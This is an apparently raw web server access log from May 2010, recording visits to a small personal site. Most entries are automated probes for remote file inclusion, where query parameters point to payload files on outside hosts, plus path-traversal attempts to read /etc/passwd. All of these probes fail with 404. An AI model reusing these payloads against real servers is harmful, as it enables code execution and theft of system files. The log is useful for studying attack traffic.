124.49.100.254 - - [03/May/2010:01:16:48 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:01:16:52 -0500] "GET //common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:01:16:52 -0500] "GET /logs//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:01:16:52 -0500] "GET /logs/access_log.1264464000//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:01:16:55 -0500] "GET /logs/access_log.1266019200//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:01:16:58 -0500] "GET /logs/access_log.1264464000//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:01:16:58 -0500] "GET //common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:01:16:58 -0500] "GET /logs//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:01:17:01 -0500] "GET /logs/access_log.1266019200//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
67.195.112.180 - - [03/May/2010:01:17:44 -0500] "GET /logs/access_log.1254528000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
220.80.108.70 - - [03/May/2010:01:18:26 -0500] "GET /logs//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:01:18:27 -0500] "GET /logs/access_log.1264464000//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:01:18:27 -0500] "GET //common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:01:18:29 -0500] "GET /logs/access_log.1266019200//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.88.4.141 - - [03/May/2010:01:20:15 -0500] "GET //common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.88.4.141 - - [03/May/2010:01:20:15 -0500] "GET /logs//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
121.88.4.141 - - [03/May/2010:01:20:15 -0500] "GET /logs/access_log.1264464000//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.88.4.141 - - [03/May/2010:01:20:17 -0500] "GET /logs/access_log.1266019200//common/db.php?commonpath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
207.46.13.138 - - [03/May/2010:01:22:24 -0500] "GET /logs/access_log.1163808000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
123.30.181.5 - - [03/May/2010:01:28:59 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
123.30.181.5 - - [03/May/2010:01:28:59 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
123.30.181.5 - - [03/May/2010:01:28:59 -0500] "GET /logs/access_log.1270684800%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
123.30.181.5 - - [03/May/2010:01:29:03 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
123.30.181.5 - - [03/May/2010:01:29:03 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
123.30.181.5 - - [03/May/2010:01:29:03 -0500] "GET /logs/access_log.1270684800%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
123.30.181.5 - - [03/May/2010:01:29:35 -0500] "GET /logs/access_log.1268611200%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
123.30.181.5 - - [03/May/2010:01:29:38 -0500] "GET /logs/access_log.1268611200%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
123.30.181.5 - - [03/May/2010:01:33:34 -0500] "GET /logs/access_log.1266537600//include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
123.30.181.5 - - [03/May/2010:01:33:39 -0500] "GET /logs/access_log.1266537600//include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
123.30.181.5 - - [03/May/2010:01:34:54 -0500] "GET /logs/access_log.1262649600/index0.php?show=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
123.30.181.5 - - [03/May/2010:01:34:54 -0500] "GET /logs/index0.php?show=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
123.30.181.5 - - [03/May/2010:01:34:54 -0500] "GET /index0.php?show=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
123.30.181.5 - - [03/May/2010:01:35:11 -0500] "GET /index0.php?show=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
123.30.181.5 - - [03/May/2010:01:35:11 -0500] "GET /logs/index0.php?show=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
123.30.181.5 - - [03/May/2010:01:35:11 -0500] "GET /logs/access_log.1262649600/index0.php?show=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
123.30.181.5 - - [03/May/2010:01:36:20 -0500] "GET /logs/access_log.1262390400/index0.php?show=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
212.241.177.123 - - [03/May/2010:01:36:45 -0500] "GET /logs/access_log.1265587200//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
212.241.177.123 - - [03/May/2010:01:36:45 -0500] "GET /logs//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
212.241.177.123 - - [03/May/2010:01:36:45 -0500] "GET /logs/access_log.1263945600//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
212.241.177.123 - - [03/May/2010:01:36:45 -0500] "GET //txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
123.30.181.5 - - [03/May/2010:01:37:01 -0500] "GET /logs/access_log.1262390400/index0.php?show=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
72.26.122.245 - - [03/May/2010:01:37:12 -0500] "GET /logs//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
72.26.122.245 - - [03/May/2010:01:37:12 -0500] "GET /logs/access_log.1265587200//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
72.26.122.245 - - [03/May/2010:01:37:12 -0500] "GET //txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
72.26.122.245 - - [03/May/2010:01:37:12 -0500] "GET /logs/access_log.1263945600//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
72.26.122.245 - - [03/May/2010:01:37:17 -0500] "GET //txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
72.26.122.245 - - [03/May/2010:01:37:17 -0500] "GET /logs/access_log.1265587200//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
72.26.122.245 - - [03/May/2010:01:37:17 -0500] "GET /logs//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
72.26.122.245 - - [03/May/2010:01:37:17 -0500] "GET /logs/access_log.1263945600//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
193.105.206.194 - - [03/May/2010:01:37:52 -0500] "GET //txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
193.105.206.194 - - [03/May/2010:01:37:55 -0500] "GET /logs//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
193.105.206.194 - - [03/May/2010:01:37:55 -0500] "GET /logs/access_log.1265587200//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
193.105.206.194 - - [03/May/2010:01:37:57 -0500] "GET /logs/access_log.1263945600//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
72.145.138.7 - - [03/May/2010:01:38:25 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://www.ravensgard.org/gerekr/costume.html""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
72.145.138.7 - - [03/May/2010:01:38:26 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
72.145.138.7 - - [03/May/2010:01:38:26 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
72.145.138.7 - - [03/May/2010:01:38:26 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
72.145.138.7 - - [03/May/2010:01:38:27 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
72.145.138.7 - - [03/May/2010:01:38:31 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
123.30.181.5 - - [03/May/2010:01:39:32 -0500] "GET /logs/access_log.1270598400%20%20/index0.php?show=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
123.30.181.5 - - [03/May/2010:01:39:40 -0500] "GET /logs/access_log.1270598400%20%20/index0.php?show=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.250.255.243 - - [03/May/2010:01:43:06 -0500] "GET /logs/access_log.1219104000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
213.175.223.80 - - [03/May/2010:01:48:55 -0500] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
213.175.223.80 - - [03/May/2010:01:48:55 -0500] "GET //main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
207.46.13.51 - - [03/May/2010:01:50:55 -0500] "GET /logs/access_log.1210636800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.175.26.98 - - [03/May/2010:01:51:59 -0500] "GET //main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
83.103.70.86 - - [03/May/2010:01:52:10 -0500] "GET //main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
67.195.112.180 - - [03/May/2010:01:53:13 -0500] "GET /logs/access_log.1211241600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.129.119.43 - - [03/May/2010:01:54:29 -0500] "GET /logs/?N=A HTTP/1.1" 200 4114 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
123.30.181.5 - - [03/May/2010:01:55:03 -0500] "GET /logs/access_log.1270857600%20%20//main.php?sayfa=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
123.30.181.5 - - [03/May/2010:01:55:03 -0500] "GET //main.php?sayfa=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
123.30.181.5 - - [03/May/2010:01:55:03 -0500] "GET /logs//main.php?sayfa=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
213.175.223.80 - - [03/May/2010:01:55:28 -0500] "GET //main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
123.30.181.5 - - [03/May/2010:01:55:45 -0500] "GET /logs/access_log.1229731200%20%20//main.php?sayfa=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
82.147.11.62 - - [03/May/2010:01:56:21 -0500] "GET /rachel%20study/rachel-18.jpg HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6; taptu-downloader) Gecko/20070725 Firefox/2.0.0.6"
82.147.11.62 - - [03/May/2010:01:56:21 -0500] "GET /rachel%20study/rachel%20animation.htm HTTP/1.1" 404 317 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6; taptu-downloader) Gecko/20070725 Firefox/2.0.0.6"
123.30.181.5 - - [03/May/2010:01:56:31 -0500] "GET //main.php?sayfa=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
123.30.181.5 - - [03/May/2010:01:56:31 -0500] "GET /logs//main.php?sayfa=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
123.30.181.5 - - [03/May/2010:01:56:31 -0500] "GET /logs/access_log.1270857600%20%20//main.php?sayfa=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:01:56:34 -0500] "GET /logs//main.php?sayfa=http://www.e-gestur.com/econatura//components/com_zoom/classes/iptc/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:01:56:34 -0500] "GET /logs/access_log.1270598400%20%20//main.php?sayfa=http://www.e-gestur.com/econatura//components/com_zoom/classes/iptc/Ckrid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
81.177.33.14 - - [03/May/2010:01:56:34 -0500] "GET //main.php?sayfa=http://www.e-gestur.com/econatura//components/com_zoom/classes/iptc/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
76.29.68.79 - - [03/May/2010:01:56:42 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.bing.com/images/search?q=tattoos+flash&form=QBIR&qs=AS&sk=&pq=tattoos+flas&sp=1&sc=1-12""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.29.68.79 - - [03/May/2010:01:56:43 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.29.68.79 - - [03/May/2010:01:56:45 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://www.bing.com/images/search?q=tattoos+flash&form=QBIR&qs=AS&sk=&pq=tattoos+flas&sp=1&sc=1-12""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
123.30.181.5 - - [03/May/2010:01:56:55 -0500] "GET /logs/access_log.1229731200%20%20//main.php?sayfa=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
204.236.235.245 - - [03/May/2010:01:57:13 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
204.236.235.245 - - [03/May/2010:01:57:13 -0500] "GET /costume/thmb7.htm HTTP/1.0" 200 2938 "-""ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
195.160.224.208 - - [03/May/2010:01:57:27 -0500] "GET //main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
94.23.15.24 - - [03/May/2010:01:59:06 -0500] "GET /logs/xGB.php?act=admin&do=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
94.23.15.24 - - [03/May/2010:01:59:06 -0500] "GET /logs/access_log.1268956800/xGB.php?act=admin&do=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
94.23.15.24 - - [03/May/2010:01:59:06 -0500] "GET /xGB.php?act=admin&do=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 291 "-""Mozilla/5.0"
94.23.15.24 - - [03/May/2010:01:59:06 -0500] "GET /logs/access_log.1268956800/xGB.php?act=admin&do=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
94.23.15.24 - - [03/May/2010:01:59:06 -0500] "GET /logs/xGB.php?act=admin&do=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
94.23.15.24 - - [03/May/2010:01:59:06 -0500] "GET /xGB.php?act=admin&do=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 291 "-""Mozilla/5.0"
184.73.71.238 - - [03/May/2010:02:00:01 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.71.238 - - [03/May/2010:02:00:01 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.71.238 - - [03/May/2010:02:00:14 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.71.238 - - [03/May/2010:02:00:14 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.71.238 - - [03/May/2010:02:00:14 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.71.238 - - [03/May/2010:02:00:15 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.71.238 - - [03/May/2010:02:00:15 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.71.238 - - [03/May/2010:02:00:15 -0500] "GET /tattoo/links.htm HTTP/1.1" 200 1325 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
94.23.15.24 - - [03/May/2010:02:01:09 -0500] "GET /logs/access_log.1268956800%20%20/xGB.php?act=admin&do=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
94.23.15.24 - - [03/May/2010:02:01:13 -0500] "GET /logs/access_log.1268956800%20%20/xGB.php?act=admin&do=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
94.23.15.24 - - [03/May/2010:02:01:16 -0500] "GET /logs/access_log.1270598400%20%20/xGB.php?act=admin&do=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
94.23.15.24 - - [03/May/2010:02:01:19 -0500] "GET /logs/access_log.1270598400%20%20/xGB.php?act=admin&do=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.115.111.248 - - [03/May/2010:02:03:06 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
207.46.13.90 - - [03/May/2010:02:03:25 -0500] "GET /logs/access_log.1253318400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.180 - - [03/May/2010:02:04:54 -0500] "GET /logs/access_log.1214611200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.103.70.86 - - [03/May/2010:02:07:45 -0500] "GET /logs/access_log.1229731200//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
83.103.70.86 - - [03/May/2010:02:07:45 -0500] "GET //main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
83.103.70.86 - - [03/May/2010:02:07:45 -0500] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
83.103.70.86 - - [03/May/2010:02:08:29 -0500] "GET /logs/access_log.1270857600//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
213.175.223.80 - - [03/May/2010:02:10:45 -0500] "GET /logs/access_log.1270857600//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
213.175.223.80 - - [03/May/2010:02:10:45 -0500] "GET //main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.175.223.80 - - [03/May/2010:02:10:45 -0500] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
213.175.223.80 - - [03/May/2010:02:12:18 -0500] "GET /logs/access_log.1229731200//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
195.160.224.208 - - [03/May/2010:02:13:28 -0500] "GET /logs/access_log.1229731200//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
195.160.224.208 - - [03/May/2010:02:13:29 -0500] "GET //main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
195.160.224.208 - - [03/May/2010:02:13:32 -0500] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
69.175.26.98 - - [03/May/2010:02:13:37 -0500] "GET /logs/access_log.1229731200//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
69.175.26.98 - - [03/May/2010:02:13:37 -0500] "GET //main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
69.175.26.98 - - [03/May/2010:02:13:37 -0500] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
195.160.224.208 - - [03/May/2010:02:14:32 -0500] "GET /logs/access_log.1270857600//main.php?sayfa=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
204.236.235.245 - - [03/May/2010:02:16:32 -0500] "GET /costume/thmb1.htm HTTP/1.0" 200 3957 "-""ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
87.250.255.243 - - [03/May/2010:02:23:03 -0500] "GET /costume/costume2.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
75.136.121.230 - - [03/May/2010:02:25:13 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://cuitz.com/id/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
